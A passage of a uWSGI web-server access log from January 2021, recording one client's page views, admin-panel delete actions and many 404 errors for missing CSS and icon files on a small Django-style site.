/static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 189/287] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 15:37:44 2021] GET /single/5 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 190/288] 117.100.100.38 () {40 vars in 1395 bytes} [Fri Jan 8 15:37:44 2021] GET /single/5/ => generated 8171 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 191/289] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:37:44 2021] GET /single/5/None => generated 8171 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 192/290] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:48 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 193/291] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:48 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +delete +[pid: 18965|app: 0|req: 194/292] 117.100.100.38 () {48 vars in 1497 bytes} [Fri Jan 8 15:37:50 2021] POST /admin-home/ => generated 27 bytes in 4 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 195/293] 117.100.100.38 () {40 vars in 1399 bytes} [Fri Jan 8 15:37:50 2021] GET /admin-home/ => generated 12641 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 196/294] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 197/295] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 198/296] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 200/297] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 200/298] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 201/299] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 202/300] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 203/301] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:50 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 204/302] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:50 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +delete +[pid: 18965|app: 0|req: 205/303] 117.100.100.38 () {48 vars in 1497 bytes} [Fri Jan 8 15:37:52 2021] POST /admin-home/ => generated 27 bytes in 4 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 206/304] 117.100.100.38 () {40 vars in 1399 bytes} [Fri Jan 8 15:37:52 2021] GET /admin-home/ => generated 11105 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 207/305] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 208/306] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 209/307] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 210/308] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 211/309] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 212/310] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 213/311] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 214/312] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:52 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 215/313] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:52 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +delete +[pid: 18965|app: 0|req: 216/314] 117.100.100.38 () {48 vars in 1497 bytes} [Fri Jan 8 15:37:52 2021] POST /admin-home/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 217/315] 117.100.100.38 () {40 vars in 1399 bytes} [Fri Jan 8 15:37:53 2021] GET /admin-home/ => generated 9569 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 218/316] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 219/317] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 220/318] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 221/319] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 222/320] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 223/321] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 224/322] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 225/323] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:53 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 226/324] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:53 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 227/325] 117.100.100.38 () {40 vars in 1395 bytes} [Fri Jan 8 15:37:54 2021] GET /single/5/ => generated 8171 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 228/326] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:37:54 2021] GET /single/5/None => generated 8171 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 229/327] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:56 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 230/328] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:56 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 231/329] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:56 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 232/330] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:56 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 233/331] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:56 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +delete +[pid: 18965|app: 0|req: 234/332] 117.100.100.38 () {48 vars in 1497 bytes} [Fri Jan 8 15:37:57 2021] POST /admin-home/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 235/333] 117.100.100.38 () {40 vars in 1399 bytes} [Fri Jan 8 15:37:57 2021] GET /admin-home/ => generated 8036 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 236/334] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 237/335] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 238/336] 117.100.100.38 () {38 vars in 1318 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 239/337] 117.100.100.38 () {38 vars in 1338 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 240/338] 117.100.100.38 () {38 vars in 1338 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 241/339] 117.100.100.38 () {38 vars in 1354 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 242/340] 117.100.100.38 () {38 vars in 1395 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 243/341] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:37:57 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 244/342] 117.100.100.38 () {38 vars in 1285 bytes} [Fri Jan 8 15:37:57 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 245/343] 117.100.100.38 () {40 vars in 1392 bytes} [Fri Jan 8 15:37:58 2021] GET /single/6 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 246/344] 117.100.100.38 () {40 vars in 1394 bytes} [Fri Jan 8 15:37:58 2021] GET /single/6/ => generated 8771 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/345] 117.100.100.38 () {40 vars in 1425 bytes} [Fri Jan 8 15:37:58 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/346] 117.100.100.38 () {38 vars in 1418 bytes} [Fri Jan 8 15:37:58 2021] GET /static/img/r_photo/3_%E6%96%87%E6%9C%AC%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE.png => generated 110927 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 247/347] 117.100.100.38 () {38 vars in 1351 bytes} [Fri Jan 8 15:38:00 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 248/348] 117.100.100.38 () {38 vars in 1363 bytes} [Fri Jan 8 15:38:00 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 249/349] 117.100.100.38 () {38 vars in 1355 bytes} [Fri Jan 8 15:38:00 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 250/350] 117.100.100.38 () {38 vars in 1319 bytes} [Fri Jan 8 15:38:00 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 251/351] 117.100.100.38 () {38 vars in 1395 bytes} [Fri Jan 8 15:38:00 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 252/352] 117.100.100.38 () {38 vars in 1285 bytes} [Fri Jan 8 15:38:00 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 253/353] 117.100.100.38 () {40 vars in 1398 bytes} [Fri Jan 8 15:38:02 2021] GET /admin-home/ => generated 8036 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 254/354] 117.100.100.38 () {38 vars in 1363 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 255/355] 117.100.100.38 () {38 vars in 1351 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 256/356] 117.100.100.38 () {38 vars in 1355 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 257/357] 117.100.100.38 () {38 vars in 1339 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 258/358] 117.100.100.38 () {38 vars in 1319 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 259/359] 117.100.100.38 () {38 vars in 1339 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 260/360] 117.100.100.38 () {38 vars in 1395 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 261/361] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:38:02 2021] GET /static/css/spinners.css => generated 3433 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 262/362] 117.100.100.38 () {38 vars in 1285 bytes} [Fri Jan 8 15:38:02 2021] GET /static/css/animate.css => generated 3430 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 263/363] 117.100.100.38 () {40 vars in 1400 bytes} [Fri Jan 8 15:38:03 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 264/364] 117.100.100.38 () {40 vars in 1402 bytes} [Fri Jan 8 15:38:03 2021] GET /announcement/ => generated 7409 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 265/365] 117.100.100.38 () {38 vars in 1353 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 266/366] 117.100.100.38 () {38 vars in 1365 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 267/367] 117.100.100.38 () {38 vars in 1321 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 268/368] 117.100.100.38 () {38 vars in 1357 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 269/369] 117.100.100.38 () {38 vars in 1341 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 270/370] 117.100.100.38 () {38 vars in 1341 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 271/371] 117.100.100.38 () {38 vars in 1397 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 272/372] 117.100.100.38 () {38 vars in 1290 bytes} [Fri Jan 8 15:38:04 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 273/373] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:38:04 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 274/374] 117.100.100.38 () {40 vars in 1401 bytes} [Fri Jan 8 15:38:05 2021] GET /kind-manage => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 275/375] 117.100.100.38 () {40 vars in 1403 bytes} [Fri Jan 8 15:38:05 2021] GET /kind-manage/ => generated 10151 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 276/376] 117.100.100.38 () {38 vars in 1353 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 277/377] 117.100.100.38 () {38 vars in 1357 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 278/378] 117.100.100.38 () {38 vars in 1365 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 279/379] 117.100.100.38 () {38 vars in 1341 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 280/380] 117.100.100.38 () {38 vars in 1321 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 